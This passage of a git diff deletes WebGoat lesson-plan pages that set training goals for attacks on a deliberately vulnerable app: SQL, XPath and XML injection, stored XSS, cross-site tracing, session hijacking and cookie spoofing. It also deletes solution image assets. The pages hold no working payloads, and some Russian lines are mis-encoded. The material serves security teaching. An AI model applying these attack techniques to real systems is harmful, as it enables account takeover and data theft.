-This lesson has several stages. You play the attacker but also the victim.
-After having done this lesson it should be understood how
-a Session Fixation in general works. It should be also understood that
-it is a bad idea to use the Get-Request for Session IDs.
-
-
diff --git a/src/main/webapp/lesson_plans/en/SilentTransactions.html b/src/main/webapp/lesson_plans/en/SilentTransactions.html
deleted file mode 100644
index d3377dce8..000000000
--- a/src/main/webapp/lesson_plans/en/SilentTransactions.html
+++ /dev/null
@@ -1,24 +0,0 @@
-
-
Lesson Plan Title: How to Perform Silent Transactions Attacks.
-
-
-
Concept / Topic To Teach:
-This lesson teaches how to perform silent transactions attacks.
-
-
-
-How the attacks works:
-
-Any system that silently processes transactions using a single submission is dangerous to the client.
-For example, if a normal web application allows a simple URL submission, a preset session attack will
-allow the attacker to complete a transaction without the user’s authorization.
-In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page,
-so an injected attack script may be able to steal money from the client without authorization.
-
-
General Goal(s):
-
-* This is a sample internet banking application - money transfer page.
-* It shows below your balance, the account you are transferring to and amount you will transfer.
-* The application uses AJAX to submit the transaction after doing some basic client side validations.
-* Your goal is to try to bypass the user's authorization and silently execute the transaction.
-
diff --git a/src/main/webapp/lesson_plans/en/SoapRequest.html b/src/main/webapp/lesson_plans/en/SoapRequest.html
deleted file mode 100644
index b96226617..000000000
--- a/src/main/webapp/lesson_plans/en/SoapRequest.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Create a SOAP Request
-
-
Concept / Topic To Teach:
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file.
-
General Goal(s):
-Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request. You must access 2 of the operations to pass this lesson.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/SqlNumericInjection.html b/src/main/webapp/lesson_plans/en/SqlNumericInjection.html
deleted file mode 100644
index a081c1a29..000000000
--- a/src/main/webapp/lesson_plans/en/SqlNumericInjection.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lesson Plan Title: How to Perform Numeric SQL Injection
-
-
-
Concept / Topic To Teach:
-
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
-
-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
General Goal(s):
-The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/StoredXss.html b/src/main/webapp/lesson_plans/en/StoredXss.html
deleted file mode 100644
index e2662164f..000000000
--- a/src/main/webapp/lesson_plans/en/StoredXss.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Perform Stored Cross Site Scripting (XSS)
-
-
Concept / Topic To Teach:
-
-It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
-
-
General Goal(s):
-The user should be able to add message content that cause another user to load an undesireable page or content.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html b/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html
deleted file mode 100644
index 1b01a915d..000000000
--- a/src/main/webapp/lesson_plans/en/ThreadSafetyProblem.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
-
-
-
- Lesson Plan
-
-
-
-
-
Lesson Plan Title: How to Exploit Thread Safety Problems
-
-
-
Concept / Topic To Teach:
-
- Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
-
-
General Goal(s):
-The user should be able to exploit the concurrency error in the web application and view login information for another user that is attempting the same function at the same time. This will require the use of two browsers.
-
-
-
diff --git a/src/main/webapp/lesson_plans/en/TomcatSetup.html b/src/main/webapp/lesson_plans/en/TomcatSetup.html
deleted file mode 100644
index decbd49df..000000000
--- a/src/main/webapp/lesson_plans/en/TomcatSetup.html
+++ /dev/null
@@ -1,80 +0,0 @@
-
-
How To Configure Tomcat
-
Introduction
-
WebGoat comes with default configurations for Tomcat. This page will explain these configurations
-and other possible configurations for Tomcat. This is just
-a short description which should be enough in most cases. For more advanced tasks please
-refer to the Tomcat documentation. Please note that all solutions
-are written for the standard configurations on port 80 or 8080. If you use another port you have
-to adjust the solution to your configuration.
-
-
The Standard Configurations
-
WebGoat has multiple ways of being run. The
-WebGoat Wiki is the best place to find the latest configuration instructions.
-By default WebGoat will run on port 8080. In the basic configurations you use the server on your localhost.
-In Linux you have to start WebGoat as root or with sudo if you want to run it on port 80 and
- 443. Running software as root is dangerous we strongly advice to use
-the port 8080 and 8443.
-
-
-
Server Configurations
-
-If you are a single user of WebGoat the standard configurations should be
-enough but if you want to use WebGoat in laboratory or in class there
-might be the need to change the configurations. Before changing
-the configurations we recommend doing a backup of the files you change.
-
-
-
Change Ports
-
-To change the ports open Tomcat's server.xml which you find in tomcat/conf and change the
-non-SSL port. If you want to change your
-Tomcat server to use it on port 8079 for example:
-
-
-
-<!-- Define a non-SSL HTTP/1.1 Connector on port 8079 -->
-<Connector address="127.0.0.1" port="8079"...
-
-
-You can also change the SSL connector to another port of course.
-In this example to port 8442:
-
-
-<!-- Define a SSL HTTP/1.1 Connector on port 8442 -->
-<Connector address="127.0.0.1" port="8442"...
-
-
-You can also modify WebGoat's pom.xml file to change the port. You will need to modify
-the tomcat7-maven-plugin plugin configuration.
-
-
-
-
Make WebGoat Reachable From Another Client
-
THIS MAKES IT POSSIBLE TO REALLY ATTACK YOUR SERVER! DO NOT DO THIS
- UNTIL YOU KNOW WHAT YOU ARE DOING. THIS CONFIGURATION SHOULD BE ONLY USED IN
-SAFE NETWORKS!
-
By its default configuration, WebGoat is only
-reachable within the localhost. In a laboratory or a class
-there is maybe the need of having a server and a few clients.
-In this case it is possible to make WebGoat reachable.
-
-
-
Permit Only Certain Client Connection
-
-If you have made WebGoat reachable it is reachable for
-all clients. If you want to make it reachable only for certain clients specified
-by their IP you can archive this by using a 'Remote Address Filter'.
-The filter can be set in a whitebox or blackbox approach. Here is
-only discussed the whitebox approach. You have to add following lines to the
-Host section of server.xml in your Tomcat server configuration:
-
In this case only localhost, ip1 and ip2 are permitted to connect.
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/TraceXSS.html b/src/main/webapp/lesson_plans/en/TraceXSS.html
deleted file mode 100644
index 2358d4fc4..000000000
--- a/src/main/webapp/lesson_plans/en/TraceXSS.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Perform Cross Site Tracing (XST) Attacks
-
-
Concept / Topic To Teach:
-
-It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
-
General Goal(s):
-Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/UncheckedEmail.html b/src/main/webapp/lesson_plans/en/UncheckedEmail.html
deleted file mode 100644
index db3c630e9..000000000
--- a/src/main/webapp/lesson_plans/en/UncheckedEmail.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Exploit Unchecked Email
-
-
Concept / Topic To Teach:
-
-It is always a good practice to validate all inputs. Most sites allow non-authenticated users to send email to a 'friend'. This is a great mechanism for spammers to send out email using your corporate mail server.
-
-
General Goal(s):
-The user should be able to send and obnoxious email message.
diff --git a/src/main/webapp/lesson_plans/en/UsefulTools.html b/src/main/webapp/lesson_plans/en/UsefulTools.html
deleted file mode 100644
index 99bee445d..000000000
--- a/src/main/webapp/lesson_plans/en/UsefulTools.html
+++ /dev/null
@@ -1,41 +0,0 @@
-
-
-
Useful Tools
-
-Below is a list of tools we've found useful in solving the WebGoat lessons. You will need a proxy like OWASP ZAP or Paros to solve most of the lessons.
-
OWASP ZAP:
-
-Like WebGoat, Zed Attack Proxy (ZAP) is a part of OWASP and is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
-It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
-ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually..
After installing ZAP and configuring your browser to use it as a proxy on localhost we can start. To intercept a request,
-click the green arrow icon turning it red. If we browse a WebGoat page, ZAP will intercept the HTTP request.
-Here we can read and edit the intercepted parameters and headers. After editing is complete press the play icon to submit the request to the server.
-
-
-
Modern Browsers:
-
-Most modern browser have developer tools that will allow you to inspect and modify request data.
-
-
-
Wireshark
-
-Wireshark is a network protocol analyzer. You can sniff network traffic and gather useful
-informations this way.
-There are many vulnerability scanners for your own web applications. They can find XSS, Injection Flaws and other vulnerabilities. Below are links to three open source scanners.
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
-
General Goal(s):
-This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html
deleted file mode 100644
index 9c9b86c8a..000000000
--- a/src/main/webapp/lesson_plans/en/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Spoof an Authentication Cookie
-
-
-
Concept / Topic To Teach:
-
-Many applications will automatically log a user into their site if the right authentication cookie is specified. Some times the cookie values can be guessed if the algorithm for generating the cookie can be obtained. Some times the cookies are left on the client machine and can be stolen by exploiting another system vulnerability. Some times the cookies maybe intercepted using Cross site scripting. This lesson tries to make the student aware of authentication cookies and presents the student with a way to defeat the cookie authentication method in this lesson.
-
General Goal(s):
-
- The user should be able to bypass the authentication check.
-Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WeakSessionID.html b/src/main/webapp/lesson_plans/en/WeakSessionID.html
deleted file mode 100644
index 45157e0b5..000000000
--- a/src/main/webapp/lesson_plans/en/WeakSessionID.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Hijack a Session
-
-
Concept / Topic To Teach:
-
-Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
-
General Goal(s):
-Try to access an authenticated session belonging to someone else.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WelcomeScreeen.html b/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
deleted file mode 100644
index be93e40e2..000000000
--- a/src/main/webapp/lesson_plans/en/WelcomeScreeen.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title:Welcome
-
-
Concept / Topic To Teach:
-This lesson presents the basics for understanding the transfer of data between the browser and the web application.
-
Standards Addressed:
-
General Goal(s):
-
Specific Objectives:
-
Required Materials:
-
Anticipatory Set (Lead-In):
-
Step-By-Step Procedures:
-
Plan For Independent Practice:
-
Closure (Reflect Anticipatory Set):
-
Assessment Based On Objectives:
-
Extensions (For Gifted Students):
-
Possible Connections To Other Subjects:
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WsSAXInjection.html b/src/main/webapp/lesson_plans/en/WsSAXInjection.html
deleted file mode 100644
index 23a2e8607..000000000
--- a/src/main/webapp/lesson_plans/en/WsSAXInjection.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Lesson Plan Title: How to Perform Web Service SAX Injection
-
-
Concept / Topic To Teach:
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
-
General Goal(s):
-Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.
-
-
-In this exercise, try to change the password for a user other than 101.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/WsSqlInjection.html b/src/main/webapp/lesson_plans/en/WsSqlInjection.html
deleted file mode 100644
index 95738b0bf..000000000
--- a/src/main/webapp/lesson_plans/en/WsSqlInjection.html
+++ /dev/null
@@ -1,9 +0,0 @@
-
-
Lesson Plan Title: How to Perform Web Service SQL Injection
-
-
Concept / Topic To Teach:
-
-Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
-
General Goal(s):
-Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have suceeded, refresh the page and look for the 'green star'.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/en/XMLInjection.html b/src/main/webapp/lesson_plans/en/XMLInjection.html
deleted file mode 100644
index fc9c73697..000000000
--- a/src/main/webapp/lesson_plans/en/XMLInjection.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lesson Plan Title: How to Perform XML Injection Attacks.
-
-
-
Concept / Topic To Teach:
- This lesson teaches how to perform XML Injection attacks.
-
-
-
-How the attacks works:
-
-AJAX applications use XML to exchange information with the server. This XML can be easily intercepted and altered by a malicious attacker.
-
-
-
General Goal(s):
-
-WebGoat-Miles Reward Miles shows all the rewards available. Once you've entered your account ID, the lesson will show you your balance and the products you can afford. Your goal is to try to add more rewards to your allowed set of rewards. Your account ID is 836239.
-
-
diff --git a/src/main/webapp/lesson_plans/en/XPATHInjection.html b/src/main/webapp/lesson_plans/en/XPATHInjection.html
deleted file mode 100644
index 926d8f151..000000000
--- a/src/main/webapp/lesson_plans/en/XPATHInjection.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Lesson Plan Title: How to Perform XPATH Injection Attacks.
-
-
-
Concept / Topic To Teach:
- This lesson teaches how to perform XPath Injection attacks.
-
-
-
-How the attacks works:
-
-Similar to SQL Injection, XPATH Injection attacks occur when a web site uses user supplied information to query XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured or access data that they may not normally have access to.
-They may even be able to elevate their privileges on the web site if the xml data is being used for authentication (such as an xml based user file).
-
-Querying XML is done with XPath, a type of simple descriptive statement that allows the xml query to locate a piece of information. Like SQL you can specify certain attributes to find and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.
-
-
-
-
General Goal(s):
-
-The form below allows employees to see all their personal data including their salaries. Your account is Mike/test123. Your goal is to try to see other employees data as well.
-
diff --git a/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html b/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
deleted file mode 100644
index e45d57ddf..000000000
--- a/src/main/webapp/lesson_plans/ru/AccessControlMatrix.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-This lesson creates a challenge that will help the student apply all that they have learned.
-General Goal(s):
-Display the secret message.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html b/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html
deleted file mode 100644
index 1fa409480..000000000
--- a/src/main/webapp/lesson_plans/ru/ClientSideFiltering.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
-It is always a good practice to scrub all inputs, especially those
-inputs that will later be used as parameters to OS commands, scripts,
-and database queries. Users should not be able to alter the intent of
-commands that are executed on the server, in many cases as a privileged user.
-
-
General Goal(s):
-For this exercise, you will perform a SQL Injection attack.
-You will also implement code changes in the database to defeat
-these attacks.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/DOMInjection.html b/src/main/webapp/lesson_plans/ru/DOMInjection.html
deleted file mode 100644
index 8b4a87564..000000000
--- a/src/main/webapp/lesson_plans/ru/DOMInjection.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-
-Форма ниже позволÑет работникам Ñмотреть их перÑональную информацию Ð²ÐºÐ»ÑŽÑ‡Ð°Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ
-о зарплате. Ваш аккаунт - Mike/test123. Цель - проÑмотреть данные других работников.
-
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db
deleted file mode 100644
index b269eb3f5..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml
deleted file mode 100644
index d016d8ce4..000000000
--- a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png
deleted file mode 100644
index ebb3f8cb8..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg
deleted file mode 100644
index eca131d99..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png
deleted file mode 100644
index 5efe24680..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg
deleted file mode 100644
index 64245b784..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml b/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml
deleted file mode 100644
index 0c8218170..000000000
--- a/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image001.png b/src/main/webapp/lesson_solutions/BackDoors_files/image001.png
deleted file mode 100644
index 5a4d94ac7..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image003.png b/src/main/webapp/lesson_solutions/BackDoors_files/image003.png
deleted file mode 100644
index 8150275d8..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image005.png b/src/main/webapp/lesson_solutions/BackDoors_files/image005.png
deleted file mode 100644
index 62ebf88f6..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image007.png b/src/main/webapp/lesson_solutions/BackDoors_files/image007.png
deleted file mode 100644
index 9960dbc61..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image009.png b/src/main/webapp/lesson_solutions/BackDoors_files/image009.png
deleted file mode 100644
index be39f6ac3..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image011.png b/src/main/webapp/lesson_solutions/BackDoors_files/image011.png
deleted file mode 100644
index ef6e16606..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg
deleted file mode 100644
index c25f12992..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg
deleted file mode 100644
index 08f893f3d..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg
deleted file mode 100644
index 08c662842..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg
deleted file mode 100644
index 9299a4a2f..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg
deleted file mode 100644
index 49760e726..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg
deleted file mode 100644
index 735ea196b..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx b/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml b/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml
deleted file mode 100644
index 7f6641efb..000000000
--- a/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml
+++ /dev/null
@@ -1,30 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png
deleted file mode 100644
index 58cb8db49..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png
deleted file mode 100644
index e7380275b..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png
deleted file mode 100644
index 6984b9e74..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png
deleted file mode 100644
index bebf90cda..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png
deleted file mode 100644
index 917746bad..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png
deleted file mode 100644
index 05f16f195..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png
deleted file mode 100644
index f66852324..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png
deleted file mode 100644
index d167a7f35..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png
deleted file mode 100644
index 9139ad257..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png
deleted file mode 100644
index f8604adae..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png
deleted file mode 100644
index 5788c8d43..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png
deleted file mode 100644
index 368d0d456..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg
deleted file mode 100644
index b1aeffb19..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg
deleted file mode 100644
index 8addcb872..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg
deleted file mode 100644
index 0245a850c..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg
deleted file mode 100644
index 9e6b65ff8..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg
deleted file mode 100644
index 3586cede5..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg
deleted file mode 100644
index cdc430d9b..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg
deleted file mode 100644
index e9bb7a278..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg
deleted file mode 100644
index b4e1f851a..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg
deleted file mode 100644
index 468293b14..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg
